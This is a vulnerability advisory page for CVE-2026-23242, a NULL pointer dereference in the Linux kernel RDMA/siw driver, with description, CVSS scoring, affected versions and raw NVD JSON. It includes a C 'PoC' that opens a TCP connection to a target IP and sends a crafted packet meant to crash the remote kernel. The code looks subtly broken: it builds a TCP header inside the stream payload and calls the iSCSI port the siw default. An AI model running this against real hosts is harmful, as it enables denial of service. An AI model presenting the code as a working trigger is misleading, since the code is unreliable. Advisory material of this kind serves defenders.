Security Vulnerability Report
CVE-2026-23242 CVSS 7.5 HIGH

CVE-2026-23242

Published: 2026-03-18 11:16:16
Last Modified: 2026-05-21 15:43:27
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

RDMA/siw: Fix potential NULL pointer dereference in header processing

If siw_get_hdr() returns -EINVAL before set_rx_fpdu_context(), qp->rx_fpdu can be NULL. The error path in siw_tcp_rx_data() dereferences qp->rx_fpdu->more_ddp_segs without checking, which may lead to a NULL pointer deref. Only check more_ddp_segs when rx_fpdu is present.

KASAN splat:
[ 101.384271] KASAN: null-ptr-deref in range [0x00000000000000c0-0x00000000000000c7]
[ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel RDMA/siw < fixed version (kernel upgrade required)
Affected stable kernel versions include unpatched releases of 5.10.y, 5.15.y, 6.1.y, 6.6.y, and others

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-23242 PoC - Linux Kernel RDMA/siw NULL Pointer Dereference
// This PoC demonstrates triggering the vulnerability through malformed network packets
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

#define TARGET_PORT 3260 // iSER/SiW default port

// Craft a malformed DDP segment that triggers siw_get_hdr() to return -EINVAL
unsigned char* craft_malformed_packet() {
    unsigned char *packet = malloc(1024);
    memset(packet, 0, 1024);

    // TCP header
    struct tcphdr *tcp = (struct tcphdr *)packet;
    tcp->source = htons(12345);
    tcp->dest = htons(TARGET_PORT);
    tcp->seq = 0;
    tcp->ack_seq = 0;
    tcp->doff = 5;
    tcp->psh = 1;
    tcp->ack = 1;

    // Malformed DDP/RDMAP header to trigger -EINVAL in siw_get_hdr()
    unsigned char *payload = packet + sizeof(struct tcphdr);
    payload[0] = 0x00; // Invalid RDMA op code
    payload[1] = 0x00;
    payload[2] = 0x00;
    payload[3] = 0x00;

    return packet;
}

int main() {
    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket failed");
        return 1;
    }

    struct sockaddr_in target;
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(TARGET_PORT);
    target.sin_addr.s_addr = inet_addr("TARGET_IP");

    if (connect(sock, (struct sockaddr *)&target, sizeof(target)) < 0) {
        perror("connect failed");
        return 1;
    }

    unsigned char *malformed_packet = craft_malformed_packet();

    // Send malformed packet to trigger NULL pointer dereference
    send(sock, malformed_packet, 1024, 0);

    free(malformed_packet);
    close(sock);

    printf("Malformed packet sent. Check system logs for KASAN splat.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23242", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:15.887", "lastModified": "2026-05-21T15:43:26.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/siw: Fix potential NULL pointer dereference in header processing\n\nIf siw_get_hdr() returns -EINVAL before set_rx_fpdu_context(),\nqp->rx_fpdu can be NULL. The error path in siw_tcp_rx_data()\ndereferences qp->rx_fpdu->more_ddp_segs without checking, which\nmay lead to a NULL pointer deref. Only check more_ddp_segs when\nrx_fpdu is present.\n\nKASAN splat:\n[ 101.384271] KASAN: null-ptr-deref in range [0x00000000000000c0-0x00000000000000c7]\n[ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nRDMA/siw: Soluciona una posible desreferencia de puntero NULL en el procesamiento de encabezados\n\nSi siw_get_hdr() devuelve -EINVAL antes de set_rx_fpdu_context(), qp-&gt;rx_fpdu puede ser NULL. La ruta de error en siw_tcp_rx_data() desreferencia qp-&gt;rx_fpdu-&gt;more_ddp_segs sin verificar, lo que puede llevar a una desreferencia de puntero NULL. 
Solo verificar more_ddp_segs cuando rx_fpdu está presente.\n\nKASAN splat:\n[ 101.384271] KASAN: desreferencia de puntero nulo en el rango [0x00000000000000c0-0x00000000000000c7]\n[ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.1", "versionEndExcluding": "5.10.252", "matchCriteriaId": "76341382-8280-4624-A6BF-BBFD488EEB2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.14", "matchCriteriaId": "BF463CB7-1F58-4607-B847-77ED23E4B9B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.4", "matchCriteriaId": "672A3E79-EC03-479D-8503-361DFBDC8092"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.3:-:*:*:*:*:*:*", "matchCriteriaId": "D036D76E-AC69-4382-B4C1-8EDA1ABB2941"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/14ab3da122bd18920ad57428f6cf4fade8385142", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/714c99e1dc8f85f446e05be02ba83972e981a817", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8564dcc12fbb372d984ab45768cae9335777b274", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87b7a036d2c73d5bb3ae2d47dee23de465db3355", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ab61841633d10e56a58c1493a262f0d02dba2f5e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ab957056192d6bd068b3759cb2077d859cca01f0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce025f7f5d070596194315eb2e4e89d568b8a755", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ffba40b67663567481fa8a1 ... (truncated)